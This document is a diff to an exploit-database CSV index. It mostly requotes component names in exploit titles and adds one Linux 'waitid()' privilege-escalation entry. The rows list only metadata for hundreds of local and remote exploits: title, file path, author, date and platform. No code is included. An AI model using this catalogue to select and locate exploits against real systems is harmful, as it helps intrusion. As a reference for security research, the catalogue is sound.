@@ -8318,7 +8319,7 @@ id,file,description,date,author,platform,type,port 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,windows,local,0 -25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 +25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 40394,platforms/linux/local/40394.rb,"Docker Daemon - Privilege Escalation (Metasploit)",2016-09-19,Metasploit,linux,local,0 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Code Execution Local Buffer Overflow",2013-05-21,xis_one,windows,local,0 
@@ -8352,7 +8353,7 @@ id,file,description,date,author,platform,type,port 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local,0 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Buffer Overflow (SEH)",2013-06-21,Onying,windows,local,0 -26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation",2013-06-21,Hunger,freebsd,local,0 +26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation",2013-06-21,Hunger,freebsd,local,0 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 
@@ -8379,7 +8380,7 @@ id,file,description,date,author,platform,type,port 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0 -40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 +40385,platforms/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 
@@ -8440,7 +8441,7 @@ id,file,description,date,author,platform,type,port 40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 -29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 +29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 
@@ -8585,7 +8586,7 @@ id,file,description,date,author,platform,type,port 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0 -32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 +32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0 
@@ -8785,10 +8786,10 @@ id,file,description,date,author,platform,type,port 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0 -37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 +37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local,0 -37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 +37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation",2015-08-18,kpwn,osx,local,0 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",linux,local,0 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0 37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0 
@@ -8849,7 +8850,7 @@ id,file,description,date,author,platform,type,port 38357,platforms/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling / Security Bypass",2013-02-28,Technion,linux,local,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 -38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 +38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation",2015-10-01,rebel,osx,local,0 38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 
@@ -8865,7 +8866,7 @@ id,file,description,date,author,platform,type,port 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 -38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 +38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 
@@ -9003,7 +9004,7 @@ id,file,description,date,author,platform,type,port 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0 -40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 +40141,platforms/bsd/local/40141.c,"NetBSD - 'mail.local(8)' Privilege Escalation",2016-07-21,akat1,bsd,local,0 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 
@@ -9213,9 +9214,9 @@ id,file,description,date,author,platform,type,port 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 -41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 -41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0 -41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0 +41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 +41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0 +41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0 42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA 
Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0 
@@ -9243,9 +9244,9 @@ id,file,description,date,author,platform,type,port 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0 42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 -42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 +42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege 
Escalation",2017-08-22,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0 @@ -9304,6 +9305,7 @@ id,file,description,date,author,platform,type,port 43006,platforms/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,8839 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0 +43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 
@@ -9483,7 +9485,7 @@ id,file,description,date,author,platform,type,port 404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0 405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 -409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 +409,platforms/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0 
@@ -11715,7 +11717,7 @@ id,file,description,date,author,platform,type,port 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 -18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0 +18181,platforms/freebsd/remote/18181.txt,"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 
@@ -11733,7 +11735,7 @@ id,file,description,date,author,platform,type,port 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0 -18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0 +18369,platforms/bsd/remote/18369.rb,"FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0 
@@ -11834,7 +11836,7 @@ id,file,description,date,author,platform,type,port 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug Exploit",1988-08-01,anonymous,linux,remote,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 -19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 +19039,platforms/bsd/remote/19039.txt,"BSD 4.2 - 'fingerd' Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 
@@ -11942,8 +11944,8 @@ id,file,description,date,author,platform,type,port 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 -19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 -19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 +19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 +19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 
@@ -11957,7 +11959,7 @@ id,file,description,date,author,platform,type,port 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 -19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0 +19520,platforms/bsd/remote/19520.txt,"BSD - 'TelnetD' Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0 
@@ -12399,7 +12401,7 @@ id,file,description,date,author,platform,type,port 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 -20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 +20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0 
@@ -12470,8 +12472,8 @@ id,file,description,date,author,platform,type,port 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 -20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 -20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 +20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 +20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0 
